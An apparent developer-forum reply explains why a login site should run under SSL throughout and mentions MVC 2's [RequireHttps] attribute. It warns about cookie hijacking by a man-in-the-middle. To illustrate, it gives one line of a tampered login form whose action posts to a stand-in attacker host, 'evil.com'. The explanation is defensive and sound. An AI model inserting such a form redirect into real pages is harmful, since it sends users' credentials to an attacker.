Get Help:Ask a Question in our Forums|Report a Bug|More Help Resources
Jan 14, 2010 02:10 AM|LINK
What exactly are you trying to protect against? If you're trying to protect against a MITM attack (which is what developers normally think of when using SSL), then redirecting after logging in will break site security since an attacker could just hijack
your login cookie. Alternatively, they could just change your login page to contain <form action="https://www.evil.com/"> rather than the actual URL you wanted it to point to.
Generally, unless you really know what you're doing in this regard, you should run as much of the site as possible under SSL. We have a [RequireHttps] attribute in MVC 2 that you can put on your controllers to facilitate this.